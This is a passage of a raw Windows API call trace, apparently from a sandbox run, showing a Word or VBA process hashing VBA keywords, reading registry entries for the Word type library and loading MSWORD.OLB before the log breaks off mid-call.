0x10fe75 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0045.133] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0045.134] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0045.135] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0045.136] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0045.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0045.137] StringFromGUID2 (in: rguid=0x7d97730*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2066a0, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0045.137] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x206360 | out: phkResult=0x206360*=0x9f6) returned 0x0 [0045.137] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x206358 | out: phkResult=0x206358*=0x9fa) returned 0x0 [0045.137] RegEnumKeyW (in: hKey=0x9fa, dwIndex=0x0, lpName=0x206388, cchName=0xa | out: lpName="8.7") returned 0x0 [0045.138] wcscpy_s (in: _Destination=0x206370, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0045.138] RegOpenKeyW (in: hKey=0x9fa, lpSubKey="8.7", phkResult=0x206418 | out: phkResult=0x206418*=0xa0e) returned 0x0 [0045.138] _ultoa_s (in: _Val=0x409, _DstBuf=0x206390, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0045.138] RegOpenKeyA (in: hKey=0xa0e, lpSubKey="409", phkResult=0x206380 | out: phkResult=0x206380*=0x0) returned 0x2 [0045.138] _ultoa_s (in: _Val=0x9, _DstBuf=0x206390, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0045.138] RegOpenKeyA (in: hKey=0xa0e, lpSubKey="9", phkResult=0x206380 | out: phkResult=0x206380*=0x0) returned 0x2 [0045.138] RegOpenKeyA (in: hKey=0xa0e, lpSubKey="0", phkResult=0x206380 | out: phkResult=0x206380*=0xa16) returned 0x0 [0045.139] RegOpenKeyW (in: hKey=0xa16, lpSubKey="win64", phkResult=0x206388 | out: phkResult=0x206388*=0xa1e) returned 0x0 [0045.139] RegCloseKey (hKey=0xa1e) returned 0x0 [0045.139] RegCloseKey (hKey=0xa16) returned 0x0 [0045.139] _ultow_s (in: _Value=0x0, _Buffer=0x206420, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0045.139] RegOpenKeyW (in: hKey=0xa0e, lpSubKey="0", phkResult=0x2063f8 | out: phkResult=0x2063f8*=0xa12) returned 0x0 [0045.139] RegQueryValueW (in: hKey=0xa12, lpSubKey="win64", lpData=0x206440, lpcbData=0x2063f4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x2063f4) returned 0x0 [0045.140] wcscpy_s (in: _Destination=0x206770, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0045.140] RegCloseKey (hKey=0xa12) returned 0x0 [0045.140] RegCloseKey (hKey=0xa0e) returned 0x0 [0045.140] RegCloseKey (hKey=0x9fa) returned 0x0 [0045.140] RegCloseKey (hKey=0x9f6) returned 0x0 [0045.141] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x2063f8*=0x0 | out: pptlib=0x2063f8*=0x3dd7b80) returned 0x0 [0045.141] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x206418, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x25aa1d8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x25aa1d8*="\xdc3c\xe3c9\x7fe") returned 0x0 [0045.141] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206208 | out: ppvObject=0x206208*=0x0) returned 0x80004002 [0045.141] ITypeLib:RemoteGetLibAttr (in: This=0x3dd7b80, ppTLibAttr=0x206200, pDummy=0x10 | out: ppTLibAttr=0x206200, pDummy=0x10) returned 0x0 [0045.141] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x0, pbstrName=0x2061f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7d0c9a0 | out: pbstrName=0x2061f8*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7d0c9a0*="琀栀 漀甀爀猀⸀") returned 0x0 [0045.141] StringFromGUID2 (in: rguid=0x7e02c60*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x206220, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0045.141] _ultow_s (in: _Value=0x8, _Buffer=0x20616a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0045.141] _ultow_s (in: _Value=0x7, _Buffer=0x20616e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0045.141] _ultow_s (in: _Value=0x0, _Buffer=0x206172, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0045.141] wcscpy_s (in: _Destination=0x810c1e8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0045.141] wcscpy_s (in: _Destination=0x810c1ee, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0045.141] wcscpy_s (in: _Destination=0x810c23a, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0045.142] wcscpy_s (in: _Destination=0x810c248, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0045.142] wcscpy_s (in: _Destination=0x810c2be, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0045.142] ITypeLib:LocalReleaseTLibAttr (This=0x3dd7b80) returned 0x0 [0045.142] IMalloc:Realloc (This=0x7feff045380, pv=0x811c320, cb=0x1a0) returned 0x2706b70 [0045.142] wcscpy_s (in: _Destination=0x2706b70, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0045.142] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x206318, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0045.142] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0045.142] strcpy_s (in: _Dst=0x206110, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0045.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x206110, cbMultiByte=5, lpWideCharStr=0x205f60, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0045.142] wcsncpy_s (in: _Destination=0x205f10, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0045.142] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0045.142] IMalloc:Alloc (This=0x7feff045380, cb=0x11c) returned 0x8086b30 [0045.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x8086b30, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0045.142] IMalloc:Free (This=0x7feff045380, pv=0x8086b30) [0045.142] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0045.142] wcsncpy_s (in: _Destination=0x205f10, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.142] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x205e40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.142] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.142] IUnknown:AddRef (This=0x3dd7b80) returned 0x5 [0045.142] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206338 | out: ppvObject=0x206338*=0x0) returned 0x80004002 [0045.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x206300, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0045.143] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0045.143] IUnknown:Release (This=0x3dd7b80) returned 0x4 [0045.143] IUnknown:AddRef (This=0x7edf740) returned 0x3 [0045.143] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x206418, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, 